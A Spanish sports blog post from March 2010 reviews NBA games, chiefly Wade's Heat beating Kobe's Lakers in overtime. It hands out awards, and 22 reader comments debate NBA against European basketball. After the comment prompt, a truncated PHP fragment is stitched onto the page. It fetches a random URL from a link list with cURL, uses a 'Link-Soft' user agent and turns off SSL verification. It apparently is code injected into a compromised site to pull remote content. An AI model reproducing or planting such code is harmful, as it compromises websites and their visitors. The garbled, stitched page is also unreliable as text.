La Crónica (04/03/2010)

05 de March de 2010 por TheDeerHunter

Una de esas veladas que encumbran la liga a lo más alto. De esas en las que surge un duelo de proporciones épicas y titánicas. Un pulso que hubieran firmado Héctor y Aquiles.

Hemos llegado a cuestionar si Wade está entre los 5 más grandes de la temporada. En otro momento ni nos lo hubiésemos planteado pero es cierto que este curso no le ha acompañado la consistencia ni una plantilla a su altura. No ha sido así cuando Flash se ha enfrentado a “semidioses” de su nivel. La tríada suprema junto a LeBron y Kobe. Anoche le hacía una visita “la Mamba negra” y “Flash” puso el turbo.

No era el día para parar a Kobe. Sólo le hace falta a él encontrar un estímulo y vaya si lo tenía en Wade. En el intercambio de golpes no hubiera salido airoso. No anoche. Hizo falta cambiar el chip y tocó ponerse el traje de arquitecto y, por suerte para él, encontró en Quentin Richardson y Carlos Arroyo los aliados efectivos para culminar su trabajo. No encontraron Fisher ni Artest la respuesta adecuada, ni tampoco el resto del equipo llegó a alcanzar el punto. A veces pasa cuando Kobe se pone en plan “ángel vengador omnipresente”. Con todo, el choque se resolvió en la prórroga gracias al escaso acierto de los campeones desde la línea de libres y de tres. Un par de buenas acciones defensivas de Maine terminaron por decantar la balanza tras muchos buenos minutos de espectáculo baloncestístico de alto copete.

Al intercambio de golpes también se dirimió el choque entre dos muy buenos equipos de la liga, Suns y Jazz, ambos en un momento muy dulce. Dos de los mejores bases del curso, sino los dos mejores, se enfrentaron cara a cara para disfrute de sus compañeros, que se pusieron las botas. Hasta 12 jugadores rozaron o superaron los dobles dígitos y entre Deron y Nash repartieron la friolera de 24 pases de canasta. Casi hasta 90 puntos salieron directa o indirectamente de sus manos. Curiosamente el partido también se resolvió desde las líneas, que anoche fueron fatídicas para dos equipos. Okur y Stoudamire estuvieron sensacionales, como casi todo el mundo en este partido.

De postre a tanto manjar, los Grizzlies dieron buena cuenta de los Bulls, dando una imagen muy sólida. El señor Randolph se hizo una merendola con los interiores de los Bulls. Diría que no hay color entre ambos equipos. Lamentablemente es bastante posible que en playoffs sólo veamos al peor de ellos.

PREMIOS

MVP: En un primer momento íbamos lanzados a darle el premio a los 27 puntos, 5 rebotes y 14 asistencias  de Dwyane Wade pero los 31 puntos y 18 rebotes de Zach Randolph creemos que se lo valen mucho más. A lo mejor si el de Miami no hubiera perdido 6 balones…

Rookie: 8 puntos y 6 rebotes fue la producción anoche de Taj Gibson.

Sorpresa: Quentin Richardon lleva toda la temporada jugando de titular y de vez en cuando se le escapa un buen partido. Anoche 7 de 11 en triples que le valieron para llegar a los 25 puntos. Los 17 puntos, con 6 de 7 en tiro, de Carlos Arroyo, también fueron muy importantes para la victoria de los Heat.

Decepción: Por un lado la de Michael Beasley, que dista mucho de ser aquel jugador dominante que se auguraba. Por el otro los 10 puntos de Pau Gasol, que desde que discutíamos si era mejor que Nowitzki no deja de dejarnos mal (también por culpa del alemán, todo hay que decirlo).

Esfuerzo en vano: Su caso debe similar al de Lebron James, si Lakers pierde él aparece automáticamente por aquí. Hablamos, evidentemente, de Kobe Bryant, autor de 39 puntos en la derrota de su equipo frente los Heat.

Comenta

22 comentarios a esta entrada

  1. Txusma dice:
    #1

    Que 16 equipos pensáis que se clasificarían para Playoffs si en lugar de la organización por conferencias, en la NBA se jugará una liga regular con los 30 equipos enfrentándose 2 veces cada uno de ellos con el resto?

      Citar

  2. sayim dice:
    #2

    Me aventuro:
    Lakers, Nuggets, Mavs, Jazz, Thunder, Suns, Spurs, Blazers, Grizzlies, Hornets, Rockets, Cavs, Magic, Hawks, Boston y Bucks o Heat.
    A ver como se mueven los Grizzlies en el mercado, porque pueden ser un equipo a seguir el año que viene.
    Un saludo

      Citar

  3. Love Denise dice:
    #3

    Magic, Cavs , Hawks, Celtics y Toronto

    Lakers, Nuggets, Mavs, Spurs, Suns, Blazers, Jazz, Thunder, Grizzlies, Hornets, Rockets,

      Citar

  4. Love Denise dice:
    #4

    Entre Gasol, Odom y Bynum han tirado lo mismo que Bryant, ante un equipo con pivots de poca calidad. Deberían haber jugado más por dentro, no siempre Kobe va a ser el salvador (que ha estado a punto de serlo una vez más)

      Citar

  5. pcerezo dice:
    #5

    Lakers, Cavs, Nuggets, Mavs, Jazz, Magic, Hawks, Thunder, Suns, Spurs, Celtics, Grizzlies, Rockets, Hornest, Blazers, Raptors/Heat.

    Partidos como los de anoche son los que hacen esta liga tan especial. No es por meterme con los entendidos y sabios del baloncesto europeo, los que pregonan la riqueza de defensas, jugadas, conocimiento del juego, etc…pero solo en la NBA se producen estos partidos maravillosos en los que la rivalidad y genialidad de jugadores hacen que este deporte sea maravilloso.

    En Turquia Efes Pilse-Madrid 75-77 (Solo un jugador por encima de 16 puntos y nada que comentar en cuanto a espectáculo que merezca la pena)…Eso es riqueza o coñazo? (me van a caer auténticos palos…)

      Citar

  6. sabas dice:
    #6

    Claro es que se jugaban lo mismo en un partido de 82 que en el partido Efes Pilse-Madrid.
    Para gusto los colores y ni porque a ti te guste la NBA esta tiene que ser superior, ni porque a mi me encante el baloncesto europeo este debe ser el mejor. Depende mucho de lo que busques.

      Citar

  7. sabas dice:
    #7

    Ademas, ¿te pueden ser igual de interersante los dos? Yo creo que no son excluyentes.

      Citar

  8. TheDeerHunter dice:
    #8

    Yo lo que detesto de la mentalidad “europea” es que habitualmente se asocia la palabra “competir” a la palabra “defender”. Por suerte aún quedan Guardiolas o selecciones españolas de turno que rompen ese asqueroso modelo.
    Te puedes querer jugar lo que te quieras jugar… pero si dos se dedican a defender a saco ya sabes lo que vas a ver… y conviene recordar que el personal paga una entrada para pasarlo bien.
    De eso hay pocos entrenadores que se acuerden, pero en los USA lo tienen mucho más presente.

    No sabría decirte, Sabas, que es lo que uno puede buscar para disfrutar con un “a menos de 50” puntos como los que abundan por estos lares.

    Ojo, en la NBA también la habido hasta hace muy poco en el árido Este. Y algunos Brown-McMallons de turno se empeñan en recuperar el espíritu…

    De todas formas en líneas generales estoy con Sabas en una cosa… que no tienen por que ser excluyentes.
    En mi caso suelen serlo.

      Citar

  9. Love Denise dice:
    #9

    no vi el partido en cuestión Efes-Real Madrid, a lo mejor es verdad que fue un tostón, pero para nada pienso que el baloncesto europeo sea un coñazo, es verdad que es menos veloz que el americano, pero no está exento de calidad. Y si alguna estrella americana viniera a Europa, igual se llevaba una sorpresita y destacaría muchisimo menos que en la NBA. Para determinados jugadores (según sus condiciones de juego) le sería más facil anotar en EEUU, por el juego veloz, más contraataques y por ende, más canastas fáciles, que en Europa.Por ejemplo, Pienso que cuando Ricky se marche a EEUU, anotará mucho más allí que aquí.
    Sobre que ninguno superó los 16 puntos…., hay que tener en cuenta que aquí se juegan 8 minutos menos, y los equipos reparten minutos (suelen jugar 11 por equipo) y tiros; es decir, mientras que en América la estrella juega 38 min, y tira más de 20 veces, en Europa, la estrella juega 25 y tira 10, inclusive, algunos equipos no tienen un claro lider establecido, no es tan jerarquico. Lo de que ninguno superó los 16, no lo veo como sinónimo de coñazo.
    A mi tampoco me gustan partidos de 60, pero tampoco me gustan algunos partidos de la NBA con una defensa de risa, un correcalles , juego anarquico y un auténtico descontrol, que parece más una pachanga de evrano que un partido serio. Como ejemplo, algunos de Knicks o de Warriors.

      Citar

  10. Chris dice:
    #10

    Michael Finley a fichado por los Celtics, a poco que aporte en la 2ª unidad con su tiro, su defensa y su experiencia puede venir bien. Con este fichaje los es dificil que ningun equipo pueda poner un quinteto más viejuno en pista que los C´s. “Sugar” Ray (34), “The Truth” (32), Finley (37), Garnett (33) y Shedd (35).

      Citar

  11. Chris dice:
    #11

    ¡Por las edades podiamos ser yo y mis compañeros de la pachanga de los lunes y miercoles!

      Citar

  12. Txusma dice:
    #12

    Yo cuando veo un partido del Barça de este año disfruto como un enano y os prometo que algunas veces que me he quedado a ver algún partido en Cuatro, hay momentos en que bostezo muy mucho. Y sabeis cual es la diferencia principal que me cansa? Pues que en la NBA se falla muchisimo. En muchísimas ocasiones no se busca el tiro cómodo o la jugada trabajada sinó que la estrella de turno se tira lo indecible y es gracias a su calidad que puede anotar cerca de un 50%. En la NBA, el equipo con mayor acierto en el tiro es Cleveland que anota el 49% de los tiros. En la ACB el mejor es el Regal Barça con un 58%!! Y el peor es el Manresa con un 48%! Os prometo que me cansa mucho cuando los partidos de la NBA entran en esa fase de correcalles en que pueden encadenar hasta 10 ataques seguidos los 2 equipos sin anotar… E inevitablemente, casi todos los partidos tienen fases así.

      Citar

  13. kantonyo dice:
    #13

    En el porcentaje de tiro también tiene que ver con la distancia en la linea de 3p. En la nba está en 7,24m y en la NCAA en 6,32m, en Europa está en 6,25m.

    Por cierto nadie habla de lo bien que lo está haciendo Josh Childress este año. Ayer contra Caja Laboral, 20 puntos 6/10 y 10 Rebotes en 32 minutos. Le ha costado pero está siendo el gran jugador que prometia.

      Citar

  14. arivas dice:
    #14

    Es que la compracion de Love Denise es un poco tendenciosa. Si compraras un gran partido NBA como pudo ser el de anoche y uno malo de Europa como pudo ser el del RM (no vi ninguno de lso dos pero es lo que deduzco) pues evidntemente la compracion es odiosa.
    Pero vamos como bien decis en NBA tb hay partidos dificiles de ver y en Europa se ven partidazos.

      Citar

  15. arivas dice:
    #15

    Childress temporadón sí y Kleiza creo que aun mejor.

      Citar

  16. Viva_Dirk dice:
    #16

    Es que Kleiza para Europa es un jugadorazo, ya aportaba lo suyo en Denver.

    En la comparación NBA VS baloncesto europeo me quedo claramente con la NBA, me resulta dificil ver un partido europeo que realmente me entretenga, habla Txus de los porcentajes y es normal que sean mucho mas altos porque se arriesga mucho menos.

      Citar

  17. max dice:
    #17

    Pues yo estoy con Txusma. He visto unos cuantos partidos del Regal FCB este año y he disfrutado, y en cambio hay algunos cuartos de algunos partidos NBA que no se juega a nada, tirar por tirar. De todos modos, me encanta la NBA!!

      Citar

  18. David dice:
    #18

    Para mí no son en absoluto incompatibles, y cada uno tiene sus cosas buenas.
    I Love Basketball!!

      Citar

  19. sayim dice:
    #19

    Hablando del Barcelona, en que posicion creeis que quedaria en la conferencia este? porque esta claro que 6o 7 de sus jugadores tienen nivel NBA sobrados.

      Citar

  20. Love Denise dice:
    #20

    arivas, la comparación del Efes-Real Madrid con un partido NBA de los buenos no la hice yo, je jeje, sólo contesté a una opinión anterior.

      Citar

  21. Viva_Dirk dice:
    #21

    Sayim yo no creo que el Barça se clasificase para play-offs, diria que son un equipo de 25-30 victorias en el Este, y ya son victorias.

      Citar

  22. couxe dice:
    #22

    Hombre… es difícil de comparar a un equipo europeo con los equipos Nba, ya que el nivel que muestra el Barça en Europa me da que les resultaría difícil mantenerlo en una liga de 82 partidos…
    Sin embargo, y de lograrlo, con el nivel defensivo que presenta el Barça, pienso que en la conferencia Este ganaría esos 25 ó 30 partidos sólo jugando en casa… Creo que ninguno de los equipos que están en el Este del 5º puesto para abajo son netamente superiores… Algunos podrían serlo en base a los jugadores que tienen, pero a nivel trabajo táctico y de juego en equipo, y sobre todo, a nivel de compromiso, están a años luz… y eso marca diferencias enormes… insalvables para bastantes equipos del este y de la liga…
    No he visgo a ningún equipo en la Nba (ni por supuesto en Europa) que defienda a ese nivel de intensidad ni de efectividad…. y eso en la Nba hace un daño terrible…
    Así que en mi opinión estarían con un balance igualado o ligeramente positivo que les daría para pelear los playoff, e incluso el 5º puesto que ahora tiene Toronto…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>